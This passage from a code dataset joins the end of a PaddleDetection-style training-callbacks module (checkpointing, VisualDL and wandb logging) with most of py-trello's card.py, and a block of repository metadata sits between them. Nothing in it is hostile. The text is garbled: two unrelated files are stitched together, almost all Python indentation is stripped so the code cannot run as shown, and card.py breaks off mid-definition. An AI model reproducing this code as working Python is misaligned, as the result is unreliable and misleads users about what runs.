step_id = status['step_id']
if step_id % 100 == 0:
logger.info("Eval iter: {}".format(step_id))
def on_epoch_end(self, status):
if dist.get_world_size() < 2 or dist.get_rank() == 0:
mode = status['mode']
if mode == 'eval':
sample_num = status['sample_num']
cost_time = status['cost_time']
logger.info('Total sample number: {}, average FPS: {}'.format(
sample_num, sample_num / cost_time))
class Checkpointer(Callback):
def __init__(self, model):
super(Checkpointer, self).__init__(model)
self.best_ap = -1000.
self.save_dir = os.path.join(self.model.cfg.save_dir,
self.model.cfg.filename)
if hasattr(self.model.model, 'student_model'):
self.weight = self.model.model.student_model
else:
self.weight = self.model.model
def on_epoch_end(self, status):
# Checkpointer only performed during training
mode = status['mode']
epoch_id = status['epoch_id']
weight = None
save_name = None
if dist.get_world_size() < 2 or dist.get_rank() == 0:
if mode == 'train':
end_epoch = self.model.cfg.epoch
if (
epoch_id + 1
) % self.model.cfg.snapshot_epoch == 0 or epoch_id == end_epoch - 1:
save_name = str(
epoch_id) if epoch_id != end_epoch - 1 else "model_final"
weight = self.weight.state_dict()
elif mode == 'eval':
if 'save_best_model' in status and status['save_best_model']:
for metric in self.model._metrics:
map_res = metric.get_results()
eval_func = "ap"
if 'pose3d' in map_res:
key = 'pose3d'
eval_func = "mpjpe"
elif 'bbox' in map_res:
key = 'bbox'
elif 'keypoint' in map_res:
key = 'keypoint'
else:
key = 'mask'
if key not in map_res:
logger.warning("Evaluation results empty, this may be due to " \
"training iterations being too few or not " \
"loading the correct weights.")
return
if map_res[key][0] >= self.best_ap:
self.best_ap = map_res[key][0]
save_name = 'best_model'
weight = self.weight.state_dict()
logger.info("Best test {} {} is {:0.3f}.".format(
key, eval_func, abs(self.best_ap)))
if weight:
if self.model.use_ema:
exchange_save_model = status.get('exchange_save_model',
False)
if not exchange_save_model:
# save model and ema_model
save_model(
status['weight'],
self.model.optimizer,
self.save_dir,
save_name,
epoch_id + 1,
ema_model=weight)
else:
                        # save model (student model) and ema_model (teacher model);
                        # in DenseTeacher SSOD, the teacher model usually scores higher,
                        # so exchange them when saving pdparams
student_model = status['weight'] # model
teacher_model = weight # ema_model
save_model(
teacher_model,
self.model.optimizer,
self.save_dir,
save_name,
epoch_id + 1,
ema_model=student_model)
del teacher_model
del student_model
else:
save_model(weight, self.model.optimizer, self.save_dir,
save_name, epoch_id + 1)
class WiferFaceEval(Callback):
def __init__(self, model):
super(WiferFaceEval, self).__init__(model)
def on_epoch_begin(self, status):
assert self.model.mode == 'eval', \
"WiferFaceEval can only be set during evaluation"
for metric in self.model._metrics:
metric.update(self.model.model)
sys.exit()
class VisualDLWriter(Callback):
"""
Use VisualDL to log data or image
"""
def __init__(self, model):
super(VisualDLWriter, self).__init__(model)
assert six.PY3, "VisualDL requires Python >= 3.5"
try:
from visualdl import LogWriter
except Exception as e:
            logger.error('visualdl not found, please install visualdl. '
'for example: `pip install visualdl`.')
raise e
self.vdl_writer = LogWriter(
model.cfg.get('vdl_log_dir', 'vdl_log_dir/scalar'))
self.vdl_loss_step = 0
self.vdl_mAP_step = 0
self.vdl_image_step = 0
self.vdl_image_frame = 0
def on_step_end(self, status):
mode = status['mode']
if dist.get_world_size() < 2 or dist.get_rank() == 0:
if mode == 'train':
                training_status = status['training_staus']  # NOTE: dict key spelling comes from the trainer
                for loss_name, loss_value in training_status.get().items():
self.vdl_writer.add_scalar(loss_name, loss_value,
self.vdl_loss_step)
self.vdl_loss_step += 1
elif mode == 'test':
ori_image = status['original_image']
result_image = status['result_image']
self.vdl_writer.add_image(
"original/frame_{}".format(self.vdl_image_frame), ori_image,
self.vdl_image_step)
self.vdl_writer.add_image(
"result/frame_{}".format(self.vdl_image_frame),
result_image, self.vdl_image_step)
self.vdl_image_step += 1
# each frame can display ten pictures at most.
if self.vdl_image_step % 10 == 0:
self.vdl_image_step = 0
self.vdl_image_frame += 1
def on_epoch_end(self, status):
mode = status['mode']
if dist.get_world_size() < 2 or dist.get_rank() == 0:
if mode == 'eval':
for metric in self.model._metrics:
for key, map_value in metric.get_results().items():
self.vdl_writer.add_scalar("{}-mAP".format(key),
map_value[0],
self.vdl_mAP_step)
self.vdl_mAP_step += 1
class WandbCallback(Callback):
def __init__(self, model):
super(WandbCallback, self).__init__(model)
try:
import wandb
self.wandb = wandb
except Exception as e:
logger.error('wandb not found, please install wandb. '
'Use: `pip install wandb`.')
raise e
self.wandb_params = model.cfg.get('wandb', None)
self.save_dir = os.path.join(self.model.cfg.save_dir,
self.model.cfg.filename)
if self.wandb_params is None:
self.wandb_params = {}
for k, v in model.cfg.items():
if k.startswith("wandb_"):
                    self.wandb_params.update({k[len("wandb_"):]: v})  # strip prefix; lstrip would drop characters, not the prefix
self._run = None
if dist.get_world_size() < 2 or dist.get_rank() == 0:
_ = self.run
self.run.config.update(self.model.cfg)
self.run.define_metric("epoch")
self.run.define_metric("eval/*", step_metric="epoch")
self.best_ap = -1000.
self.fps = []
@property
def run(self):
if self._run is None:
if self.wandb.run is not None:
                logger.info(
                    "There is an ongoing wandb run which will be used "
                    "for logging. Please use `wandb.finish()` to end that "
                    "if the behaviour is not intended")
self._run = self.wandb.run
else:
self._run = self.wandb.init(**self.wandb_params)
return self._run
def save_model(self,
optimizer,
save_dir,
save_name,
last_epoch,
ema_model=None,
ap=None,
fps=None,
tags=None):
if dist.get_world_size() < 2 or dist.get_rank() == 0:
model_path = os.path.join(save_dir, save_name)
metadata = {}
metadata["last_epoch"] = last_epoch
if ap:
metadata["ap"] = ap
if fps:
metadata["fps"] = fps
if ema_model is None:
ema_artifact = self.wandb.Artifact(
name="ema_model-{}".format(self.run.id),
type="model",
metadata=metadata)
model_artifact = self.wandb.Artifact(
name="model-{}".format(self.run.id),
type="model",
metadata=metadata)
ema_artifact.add_file(model_path + ".pdema", name="model_ema")
model_artifact.add_file(model_path + ".pdparams", name="model")
self.run.log_artifact(ema_artifact, aliases=tags)
                self.run.log_artifact(model_artifact, aliases=tags)
else:
model_artifact = self.wandb.Artifact(
name="model-{}".format(self.run.id),
type="model",
metadata=metadata)
model_artifact.add_file(model_path + ".pdparams", name="model")
self.run.log_artifact(model_artifact, aliases=tags)
def on_step_end(self, status):
mode = status['mode']
if dist.get_world_size() < 2 or dist.get_rank() == 0:
if mode == 'train':
training_status = status['training_staus'].get()
for k, v in training_status.items():
training_status[k] = float(v)
# calculate ips, data_cost, batch_cost
batch_time = status['batch_time']
data_time = status['data_time']
batch_size = self.model.cfg['{}Reader'.format(mode.capitalize(
))]['batch_size']
ips = float(batch_size) / float(batch_time.avg)
data_cost = float(data_time.avg)
batch_cost = float(batch_time.avg)
metrics = {"train/" + k: v for k, v in training_status.items()}
metrics["train/ips"] = ips
metrics["train/data_cost"] = data_cost
metrics["train/batch_cost"] = batch_cost
self.fps.append(ips)
self.run.log(metrics)
def on_epoch_end(self, status):
mode = status['mode']
epoch_id = status['epoch_id']
save_name = None
if dist.get_world_size() < 2 or dist.get_rank() == 0:
if mode == 'train':
fps = sum(self.fps) / len(self.fps)
self.fps = []
end_epoch = self.model.cfg.epoch
if (
epoch_id + 1
) % self.model.cfg.snapshot_epoch == 0 or epoch_id == end_epoch - 1:
save_name = str(
epoch_id) if epoch_id != end_epoch - 1 else "model_final"
tags = ["latest", "epoch_{}".format(epoch_id)]
self.save_model(
self.model.optimizer,
self.save_dir,
save_name,
epoch_id + 1,
self.model.use_ema,
fps=fps,
tags=tags)
if mode == 'eval':
sample_num = status['sample_num']
cost_time = status['cost_time']
fps = sample_num / cost_time
merged_dict = {}
for metric in self.model._metrics:
for key, map_value in metric.get_results().items():
merged_dict["eval/{}-mAP".format(key)] = map_value[0]
merged_dict["epoch"] = status["epoch_id"]
                merged_dict["eval/fps"] = fps
self.run.log(merged_dict)
if 'save_best_model' in status and status['save_best_model']:
for metric in self.model._metrics:
map_res = metric.get_results()
if 'pose3d' in map_res:
key = 'pose3d'
elif 'bbox' in map_res:
key = 'bbox'
elif 'keypoint' in map_res:
key = 'keypoint'
else:
key = 'mask'
if key not in map_res:
logger.warning("Evaluation results empty, this may be due to " \
"training iterations being too few or not " \
"loading the correct weights.")
return
if map_res[key][0] >= self.best_ap:
self.best_ap = map_res[key][0]
save_name = 'best_model'
tags = ["best", "epoch_{}".format(epoch_id)]
self.save_model(
self.model.optimizer,
self.save_dir,
save_name,
last_epoch=epoch_id + 1,
ema_model=self.model.use_ema,
ap=abs(self.best_ap),
fps=fps,
tags=tags)
def on_train_end(self, status):
self.run.finish()
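# To enable this callback, the config is expected to provide wandb settings,
# either as a `wandb` dict or as `wandb_`-prefixed keys; both are forwarded
# to `wandb.init`. An illustrative YAML fragment (values are hypothetical):
#
#     wandb:
#       project: my_detection_runs
#       entity: my_team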
class SniperProposalsGenerator(Callback):
def __init__(self, model):
super(SniperProposalsGenerator, self).__init__(model)
ori_dataset = self.model.dataset
self.dataset = self._create_new_dataset(ori_dataset)
self.loader = self.model.loader
self.cfg = self.model.cfg
self.infer_model = self.model.model
def _create_new_dataset(self, ori_dataset):
dataset = copy.deepcopy(ori_dataset)
# init anno_cropper
dataset.init_anno_cropper()
# generate infer roidbs
ori_roidbs = dataset.get_ori_roidbs()
roidbs = dataset.anno_cropper.crop_infer_anno_records(ori_roidbs)
# set new roidbs
dataset.set_roidbs(roidbs)
return dataset
def _eval_with_loader(self, loader):
results = []
with paddle.no_grad():
self.infer_model.eval()
for step_id, data in enumerate(loader):
outs = self.infer_model(data)
for key in ['im_shape', 'scale_factor', 'im_id']:
outs[key] = data[key]
for key, value in outs.items():
if hasattr(value, 'numpy'):
outs[key] = value.numpy()
results.append(outs)
return results
def on_train_end(self, status):
self.loader.dataset = self.dataset
results = self._eval_with_loader(self.loader)
results = self.dataset.anno_cropper.aggregate_chips_detections(results)
# sniper
proposals = []
clsid2catid = {v: k for k, v in self.dataset.catid2clsid.items()}
for outs in results:
batch_res = get_infer_results(outs, clsid2catid)
start = 0
            for i, im_id in enumerate(outs['im_id']):
                bbox_num = outs['bbox_num']
                end = start + bbox_num[i]
                bbox_res = batch_res['bbox'][start:end] \
                    if 'bbox' in batch_res else None
                if bbox_res:
                    proposals += bbox_res
                # advance the slice window so the next image's boxes are not duplicated
                start = end
logger.info("save proposals in {}".format(self.cfg.proposals_path))
with open(self.cfg.proposals_path, 'w') as f:
json.dump(proposals, f)
|
7334faf0a81b5569092e939433542d680d2f415b
|
a526b24dcce8d802db6ad0cd387a64bd73e5f46a
|
/trello/card.py
|
c69a77d86b0faa31f1f938af03b99e1136f6036b
|
[] |
permissive
|
sarumont/py-trello
|
f430b4e8379d800739563dbc87ddd73def542a2f
|
a628d545e936ccdab299cb139f56b8f98836618e
|
refs/heads/master
| 2023-08-02T11:41:50.011554
| 2023-01-26T16:47:46
| 2023-01-26T16:47:46
| 3,123,657
| 809
| 344
|
BSD-3-Clause
| 2023-03-13T19:45:00
| 2012-01-07T08:31:17
|
Python
|
UTF-8
|
Python
| false
| false
| 30,264
|
py
|
card.py
|
# -*- coding: utf-8 -*-
from __future__ import with_statement, print_function, absolute_import
import datetime
from operator import itemgetter
import pytz
from dateutil import parser as dateparser
from trello import TrelloBase
from trello.attachments import Attachments
from trello.checklist import Checklist
from trello.compat import force_str
from trello.label import Label
from trello.organization import Organization
from trello.customfield import CustomField, CustomFieldText, CustomFieldCheckbox, CustomFieldNumber, CustomFieldDate, CustomFieldList
class Card(TrelloBase):
"""
Class representing a Trello card. Card attributes are stored on
the object
https://developers.trello.com/advanced-reference/card
"""
@property
def short_url(self):
return self.shortUrl
@property
def member_id(self):
return self.idMembers
@property
def short_id(self):
return self.idShort
@property
def list_id(self):
return self.idList
@property
def board_id(self):
return self.idBoard
@property
def description(self):
return self.desc
@property
def date_last_activity(self):
return self.dateLastActivity
@property
def labels(self):
return self._labels if self._labels else []
@property
def custom_fields(self):
"""
Lazily loads and returns the custom fields
"""
if self.customFields is None:
self.customFields = self.fetch_custom_fields()
return self.customFields
@property
def comments(self):
"""
Lazily loads and returns the comments
"""
if self._comments is None:
self._comments = self.fetch_comments()
return self._comments
@property
def checklists(self):
"""
Lazily loads and returns the checklists
"""
if self._checklists is None:
self._checklists = self.fetch_checklists()
return self._checklists
@property
def plugin_data(self):
"""
Lazily loads and returns the plugin data
"""
if self._plugin_data is None:
self._plugin_data = self.fetch_plugin_data()
return self._plugin_data
@property
def attachments(self):
"""
Lazily loads and returns the attachments
"""
if self._attachments is None:
self._attachments = self.fetch_attachments()
return self._attachments
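    # The properties above share one lazy-loading pattern: the backing
    # attribute starts as None and the first access triggers a fetch, e.g.
    # (illustrative):
    #
    #     card.checklists   # first access -> fetch_checklists() network call
    #     card.checklists   # cached, no further request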
def __init__(self, parent, card_id, name=''):
"""
:parent: reference to the parent trello list
:card_id: ID for this card
"""
super(Card, self).__init__()
if isinstance(parent, List):
self.trello_list = parent
self.board = parent.board
else:
self.board = parent
self.client = parent.client
self.id = card_id
self.name = name
self.customFields = None
self._checklists = None
self._comments = None
self._plugin_data = None
self._attachments = None
self._labels = None
self._json_obj = None
@classmethod
def from_json(cls, parent, json_obj):
"""
Deserialize the card json object to a Card object
:parent: the list object that the card belongs to
:json_obj: json object
:rtype: Card
"""
if 'id' not in json_obj:
raise Exception("key 'id' is not in json_obj")
card = cls(parent,
json_obj['id'],
name=json_obj['name'])
card._json_obj = json_obj
card.desc = json_obj.get('desc', '')
card.due = json_obj.get('due', '')
card.is_due_complete = json_obj['dueComplete']
card.closed = json_obj['closed']
card.url = json_obj['url']
card.pos = json_obj['pos']
card.shortUrl = json_obj['shortUrl']
card.idMembers = json_obj['idMembers']
card.member_ids = json_obj['idMembers']
card.idLabels = json_obj['idLabels']
card.idBoard = json_obj['idBoard']
card.idList = json_obj['idList']
card.idShort = json_obj['idShort']
card.badges = json_obj['badges']
card.customFields = card.fetch_custom_fields(json_obj=json_obj)
card.countCheckItems = json_obj['badges']['checkItems']
card.countCheckLists = len(json_obj['idChecklists'])
card._labels = Label.from_json_list(card.board, json_obj['labels'])
card.dateLastActivity = dateparser.parse(json_obj['dateLastActivity'])
if "attachments" in json_obj:
card._attachments = []
for attachment_json in json_obj["attachments"]:
card._attachments.append(attachment_json)
if 'actions' in json_obj:
card.actions = json_obj['actions']
return card
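    # Typical use (sketch): deserialize cards from a list endpoint response,
    # assuming `json_cards` came from GET /1/lists/<id>/cards:
    #
    #     cards = [Card.from_json(trello_list, obj) for obj in json_cards]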
def __repr__(self):
return force_str(u'<Card %s>' % self.name)
def fetch(self, eager=True):
"""
Fetch all attributes for this card
:param eager: If eager, comments, checklists and attachments will be fetched immediately, otherwise on demand
"""
json_obj = self.client.fetch_json(
'/cards/' + self.id,
query_params={'badges': False, 'customFieldItems': 'true'})
self.id = json_obj['id']
self.name = json_obj['name']
self.desc = json_obj.get('desc', '')
self.closed = json_obj['closed']
self.url = json_obj['url']
self.shortUrl = json_obj['shortUrl']
self.idMembers = json_obj['idMembers']
self.idShort = json_obj['idShort']
self.idList = json_obj['idList']
self.idBoard = json_obj['idBoard']
self.idLabels = json_obj['idLabels']
self._labels = Label.from_json_list(self.board, json_obj['labels'])
self.badges = json_obj['badges']
self.pos = json_obj['pos']
if json_obj.get('due', ''):
self.due = json_obj.get('due', '')
else:
self.due = ''
self.dateLastActivity = dateparser.parse(json_obj['dateLastActivity'])
        self.customFields = self.fetch_custom_fields(json_obj=json_obj)
self._plugin_data = self.fetch_plugin_data() if eager else None
self._checklists = self.fetch_checklists() if eager else None
self._comments = self.fetch_comments() if eager else None
self._attachments = self.fetch_attachments() if eager else None
def fetch_custom_fields(self, json_obj=None):
"""
Fetch current set of custom fields from card or json_obj.
"""
if json_obj is None:
json_obj = self.client.fetch_json(
'/cards/' + self.id,
query_params={'badges': False, 'customFieldItems': 'true'})
return CustomField.from_json_list(
self, json_obj.get('customFieldItems', {}))
def fetch_comments(self, force=False, limit=None):
comments = []
if (force is True) or (self.badges['comments'] > 0):
query_params = {'filter': 'commentCard,copyCommentCard'}
if limit is not None:
query_params['limit'] = limit
comments = self.client.fetch_json(
'/cards/' + self.id + '/actions',
query_params=query_params)
return sorted(comments, key=lambda comment: comment['date'])
return comments
    def get_list(self):
        obj = self.client.fetch_json('/lists/' + self.idList)
        return List.from_json(board=self.board, json_obj=obj)
def get_comments(self):
"""Alias for fetch_comments for backward compatibility.
Always contact server
"""
return self.fetch_comments(force=True)
def fetch_checklists(self):
if self.countCheckLists == 0:
return []
checklists = []
json_obj = self.client.fetch_json(
'/cards/' + self.id + '/checklists', )
        # Thanks https://github.com/HuffAndPuff for noticing checklists
        # were not sorted
json_obj = sorted(json_obj, key=lambda checklist: checklist['pos'])
for cl in json_obj:
checklists.append(Checklist(self.client, cl,
trello_card=self.id))
return checklists
def fetch_plugin_data(self):
items = self.client.fetch_json(
'/cards/' + self.id + '/pluginData')
return items
def fetch_attachments(self, force=False):
if (force is True) or (self.badges['attachments'] > 0):
items = self.client.fetch_json(
'/cards/' + self.id + '/attachments',
query_params={'filter':'false'})
return items
return []
def get_attachments(self):
return [Attachments.from_json(attachments_json) for attachments_json in self.fetch_attachments(force=True)]
    def fetch_actions(self, action_filter='createCard', since=None, before=None, action_limit=50):
        """
        Fetch actions for this card. Several action types can be requested at
        once by passing a comma-separated string in action_filter; the
        response is a list of action objects.
        """
        query_params = {'filter': action_filter, 'limit': action_limit}
if since:
query_params["since"] = since
if before:
query_params["before"] = before
json_obj = self.client.fetch_json(
'/cards/' + self.id + '/actions',
query_params=query_params)
self.actions = json_obj
return self.actions
def attriExp(self, multiple):
"""
Provides the option to explore what comes from trello
:multiple is one of the attributes of GET /1/cards/[card id or shortlink]/actions
"""
self.fetch_actions(multiple)
return self.actions
@staticmethod
def _movement_as_triplet(source_list, destination_list, movement_datetime):
return [source_list["name"], destination_list["name"], movement_datetime]
@staticmethod
def _movement_as_dict(source_list, destination_list, movement_datetime):
_movement = {
"source": source_list,
"destination": destination_list,
"datetime": movement_datetime,
}
return _movement
def _list_movements(self, movement_function, filter_by_date_interval=None):
"""
Returns the list of movements of this card.
The list of movements is in descending date and time order. First movement is the closest one to now.
Its structure is a list of dicts where the lists are "source" and "destination" and both are also dicts.
Date and time of the movement is in key "datetime" as a datetime object.
:param movement_function: function that returns a representation of the movement.
:param filter_by_date_interval: Date interval used to filter card movements to return. Optional
:return: list with the movements.
"""
action_since = None if not filter_by_date_interval else filter_by_date_interval[0]
action_before = None if not filter_by_date_interval else filter_by_date_interval[1]
if not hasattr(self, "actions") or self.actions is None:
self.fetch_actions('updateCard:idList,', action_since, action_before)
movements = []
for idx in self.actions:
date_str = idx['date']
movement_datetime = dateparser.parse(date_str)
try:
source_list = idx['data']['listBefore']
destination_list = idx['data']['listAfter']
except KeyError:
continue
movement = movement_function(source_list, destination_list, movement_datetime)
movements.append(movement)
return movements
def listCardMove_date(self):
"""Will return the history of transitions of a card from one list to
another. The lower the index the more recent the historical item.
It returns a list of lists. The sublists are triplets of
starting list, ending list and when the transition occurred.
"""
return self._list_movements(movement_function=Card._movement_as_triplet)
def list_movements(self, list_cmp=None, filter_by_date_interval=None):
"""Will return the history of transitions of a card from one list to
another. The lower the index the more recent the historical item.
It returns a list of dicts in date and time descending order (the
first movement is the most recent).
Dicts are of the form source:
<listobj> destination: <listobj> datetime: <datetimeobj>
        :param: list_cmp Comparison function between lists. list_cmp(a, b) returns -1 if list a is greater than list b, and 1 otherwise.
:param: filter_by_date_interval: pair of two dates (two strings in YYYY-MM-DD format) to filter card movements by date.
"""
movement_as_dict_function = Card._movement_as_dict
if list_cmp:
def movement_as_dict_function(_source_list, _destination_list, _movement_datetime):
_movement = Card._movement_as_dict(_source_list, _destination_list, _movement_datetime)
_source_list_id = _source_list["id"]
_destination_list_id = _destination_list["id"]
_movement["moving_forward"] = list_cmp(_source_list_id, _destination_list_id) > 0
return _movement
return self._list_movements(movement_function=movement_as_dict_function, filter_by_date_interval=filter_by_date_interval)
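    # A usage sketch (hypothetical; assumes `card` is a fetched Card and that
    # list order on the board defines "forward"):
    #
    #   ordered_ids = [l.id for l in card.board.list_lists()]
    #   def list_cmp(id_a, id_b):
    #       return 1 if ordered_ids.index(id_b) > ordered_ids.index(id_a) else -1
    #
    #   moves = card.list_movements(list_cmp=list_cmp,
    #                               filter_by_date_interval=("2023-01-01", "2023-12-31"))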
def get_stats_by_list(self, lists, list_cmp=None, done_list=None, time_unit="seconds", card_movements_filter=None):
"""Gets several stats about the card by each list of the board:
- time: The time that the card has been in each column in seconds (minutes or hours).
- forward_moves: How many times this card has been the source of a forward movement.
- backward_moves: How many times this card has been the source of a backward movement.
Returns a dict where the key is list id and value is a dict with keys
time, forward_moves and backward_moves.
:param lists: list of board lists.
:param list_cmp: function that compares two lists a,b given id_a, id_b. If b is in a forward position returns 1 else -1.
:param time_unit: default to seconds. Allow specifying time in "minutes" or "hours".
:param done_list: Column that implies that the task is done. If present, time measurement will be stopped if is current task list.
:param card_movements_filter: Pair of two dates (two strings in YYYY-MM-DD format) that will filter the movements of the card. Optional.
:return: dict of the form {list_id: {time:<time card was in that list>, forward_moves: <number>, backward_moves: <number> }}
"""
tz = pytz.timezone(Organization.TIMEZONE)
# Conversion of units
        seconds_to_time_unit = lambda time: time
        if time_unit == "minutes":
            seconds_to_time_unit = lambda time: time / 60.0
        elif time_unit == "hours":
            seconds_to_time_unit = lambda time: time / 3600.0
# Creation datetime of the card
creation_datetime = self.created_date
# Time in seconds stores the seconds that our card lives in a column
stats_by_list = {list_.id: {"time":0, "forward_moves":0, "backward_moves":0} for list_ in lists}
# Last action date, used to compute the time the card spends between changes
# of columns
last_action_datetime = creation_datetime
# Changes of columns of our card
# Using list comparison function (if present) to check list position and, hence,
# if the card movement was forward or backwards
changes = self.list_movements(list_cmp, card_movements_filter)
# If there are no changes in the card, all its life has been in its creation list
if len(changes) == 0:
card_life_time = seconds_to_time_unit((datetime.datetime.now(tz) - last_action_datetime).total_seconds())
stats_by_list[self.idList]["time"] += card_life_time
else:
# Changes in card are ordered to get the dates in order
last_list = None
ordered_changes = sorted(changes, key=itemgetter("datetime"))
# For each arrival to a list, its datetime will be used to compute
# the time this card is in that destination list
for change in ordered_changes:
source_list = change["source"]
destination_list = change["destination"]
change_datetime = change["datetime"]
# For each column the total number of seconds this card is computed
source_list_id = source_list["id"]
time_from_last_list_change = seconds_to_time_unit((change_datetime - last_action_datetime).total_seconds())
# Our last action has been this change
last_action_datetime = change_datetime
# In case the source or destination list is not a list of this board, ignore them
if source_list_id not in stats_by_list:
continue
stats_by_list[source_list_id]["time"] += time_from_last_list_change
# Count if the change is to move forward or backwards
if "moving_forward" in change:
if change["moving_forward"]:
stats_by_list[source_list_id]["forward_moves"] += 1
else:
stats_by_list[source_list_id]["backward_moves"] += 1
# Store the last list
last_list = destination_list
# Adding the number of seconds the card has been in its last column (until now)
# only if the last column is not "Done" column
if done_list and last_list and last_list["id"] and last_list["id"] in stats_by_list and\
last_list["id"] != done_list.id:
time_card_has_spent_in_list_until_now = seconds_to_time_unit((datetime.datetime.now(tz) - last_action_datetime).total_seconds())
stats_by_list[last_list["id"]]["time"] += time_card_has_spent_in_list_until_now
return stats_by_list
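    # A usage sketch (hypothetical column name "Done"; `lists` comes from the board):
    #
    #   lists = card.board.list_lists()
    #   done = next(l for l in lists if l.name == "Done")
    #   stats = card.get_stats_by_list(lists, done_list=done, time_unit="hours")
    #   # -> {list_id: {"time": 3.5, "forward_moves": 2, "backward_moves": 0}, ...}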
@property
def latestCardMove_date(self):
"""Returns the date of the last card transition"""
self.fetch_actions('updateCard:idList')
if self.actions is None or len(self.actions) == 0:
return None
date_str = self.actions[0]['date']
return dateparser.parse(date_str)
@property
def created_date(self):
"""Will return the creation date of the card.
WARNING: if the card was create via convertion of a checklist item
it fails. attriExp('convertToCardFromCheckItem') allows to
test for the condition.
"""
if not hasattr(self, "creation_date"):
localtz = pytz.timezone(Organization.TIMEZONE)
self.creation_date = localtz.localize(datetime.datetime.fromtimestamp(int(self.id[0: 8], 16)))
return self.creation_date
@property
def card_created_date(self):
"""Will return the creation date of the card.
NOTE: This will return the date the card was created, even if it
was created on another board. The created_date() above actually just
returns the first activity and has the issue described in the warning.
The first 8 characters of the card id is a hexadecimal number.
Converted to a decimal from hexadecimal, the timestamp is an Unix
timestamp (the number of seconds that have elapsed since January 1,
1970 midnight UTC. See
http://help.trello.com/article/759-getting-the-time-a-card-or-board-was-created
"""
unix_time = int(self.id[:8], 16)
return datetime.datetime.fromtimestamp(unix_time)
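    # For example (hypothetical id): int("5f3c2a1b", 16) == 1597778459, a Unix
    # timestamp that datetime.datetime.fromtimestamp() resolves to a date in
    # August 2020.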
@property
def due_date(self):
return dateparser.parse(self.due) if self.due else ''
def set_name(self, new_name):
"""Update the name on the card to :new_name:
:new_name: str
"""
self._set_remote_attribute('name', new_name)
self.name = new_name
def set_description(self, description):
self._set_remote_attribute('desc', description)
self.desc = description
def set_due(self, due):
"""Set the due time for the card
:due: a datetime object
"""
datestr = due.isoformat()
self._set_remote_attribute('due', datestr)
self.due = datestr
def set_start(self, start):
"""Set the start time for the card
:start: a datetime object
"""
datestr = start.isoformat()
self._set_remote_attribute('start', datestr)
self.start = datestr
    def set_reminder(self, reminder):
        """Set a reminder time for the card
        :reminder: total number of minutes before the due date as an int
        """
        if isinstance(reminder, (float, str)):
            reminder = int(float(reminder))
        self._set_remote_attribute('dueReminder', reminder)
        self.reminder = reminder
def set_due_complete(self):
"""Set due complete
:return: None
"""
self._set_due_complete(True)
def remove_due_complete(self):
"""Remove due complete
:return: None
"""
self._set_due_complete(False)
def remove_due(self):
"""
Remove the due datetime of this card.
"""
self._set_remote_attribute('due', None)
self.due = ''
def set_pos(self, pos):
"""
Update card position in list
:pos: 'top', 'bottom' or int
"""
self._set_remote_attribute('pos', pos)
self.pos = pos
def set_custom_field(self, value, custom_field):
"""Update card custom field
Arguments:
value {[str, int, date, bool]} -- Value depending on the type of custom_field
custom_field {custom field object} -- Custom Field Object (board.get_custom_field_definitions()[0])
"""
if custom_field.field_type in ['text', 'number', 'date', 'checked']:
if value == "":
post_args = {'value': ""}
else:
post_args = {'value': {str(custom_field.field_type): value}}
else:
if value == "":
list_field_id = ""
else:
list_field_id = [
x for x, y in custom_field.list_options.items() if y == value][0]
post_args = {'idValue': list_field_id}
self.client.fetch_json(
'/card/' + self.id + '/customField/' + custom_field.id + '/item',
http_method='PUT',
post_args=post_args)
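    # A usage sketch (hypothetical field name "Priority"):
    #
    #   cf_def = next(d for d in card.board.get_custom_field_definitions()
    #                 if d.name == "Priority")
    #   card.set_custom_field("High", cf_def)  # list-type field takes an option label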
def set_closed(self, closed):
self._set_remote_attribute('closed', closed)
self.closed = closed
def delete_comment(self, comment):
# Delete this comment permanently
self.client.fetch_json(
'/cards/' + self.id + '/actions/' + comment['id'] + '/comments',
http_method='DELETE')
def delete(self):
# Delete this card permanently
self.client.fetch_json(
'/cards/' + self.id,
http_method='DELETE')
def assign(self, member_id):
self.client.fetch_json(
'/cards/' + self.id + '/members',
http_method='POST',
post_args={'value': member_id})
def unassign(self, member_id):
self.client.fetch_json(
'/cards/' + self.id + '/idMembers/' + member_id,
http_method='DELETE')
def subscribe(self):
self.client.fetch_json(
'/cards/' + self.id + '/subscribed',
http_method='PUT',
post_args={'value': True})
def comment(self, comment_text):
"""Add a comment to a card.
:comment_text: str
"""
comment_data = self.client.fetch_json(
'/cards/' + self.id + '/actions/comments',
http_method='POST',
post_args={'text': comment_text})
return comment_data
def update_comment(self, comment_id, comment_text):
"""Update a comment."""
comment_data = self.client.fetch_json(
'/actions/' + comment_id,
http_method='PUT',
post_args={'text': comment_text}
)
return comment_data
def add_label(self, label):
self.client.fetch_json(
'/cards/' + self.id + '/idLabels',
http_method='POST',
post_args={'value': label.id})
def create_label(self, name, color):
self.client.fetch_json(
"/cards/" + self.id + "/labels",
http_method='POST',
post_args={"name": name, "color": color})
def remove_label(self, label):
self.client.fetch_json(
'/cards/' + self.id + '/idLabels/' + label.id,
http_method='DELETE')
def add_member(self, member):
self.client.fetch_json(
'/cards/' + self.id + '/idMembers',
http_method='POST',
post_args={'value': member.id})
def remove_member(self, member):
self.client.fetch_json(
'/cards/' + self.id + '/idMembers/' + member.id,
http_method='DELETE')
    def attach(self, name=None, mimeType=None, file=None, url=None, setCover=None):
        """
        Add an attachment to the card. The attachment can be either a
        file or a url. Setting the name and/or mime type is optional.
        :param name: The name of the attachment
        :param mimeType: mime type for the attachment
        :param file: a file-like, binary object that supports read()
        :param url: a URL pointing to the resource to be attached
        :param setCover: boolean, whether to set the attachment as the card cover
        """
if (file and url) or (not file and not url):
raise Exception('Please provide either a file or url, and not both!')
kwargs = {}
if file:
kwargs['files'] = dict(file=(name, file, mimeType))
else:
kwargs['name'] = name
kwargs['mimeType'] = mimeType
kwargs['url'] = url
kwargs['setCover'] = setCover
return self._post_remote_data('attachments', **kwargs)
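    # A usage sketch (hypothetical file path and URL):
    #
    #   with open("report.pdf", "rb") as f:
    #       card.attach(name="report.pdf", mimeType="application/pdf", file=f)
    #   card.attach(url="https://example.com/diagram.png", setCover=True)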
def remove_attachment(self, attachment_id):
"""
Remove attachment from card
:param attachment_id: Attachment id
:return: None
"""
self.client.fetch_json(
'/cards/' + self.id + '/attachments/' + attachment_id,
http_method='DELETE')
def change_pos(self, position):
self.client.fetch_json(
'/cards/' + self.id + '/pos',
http_method='PUT',
post_args={'value': position})
def change_list(self, list_id):
self.client.fetch_json(
'/cards/' + self.id + '/idList',
http_method='PUT',
post_args={'value': list_id})
def change_board(self, board_id, list_id=None):
args = {'value': board_id}
if list_id is not None:
args['idList'] = list_id
self.client.fetch_json(
'/cards/' + self.id + '/idBoard',
http_method='PUT',
post_args=args)
def add_checklist(self, title, items, itemstates=None):
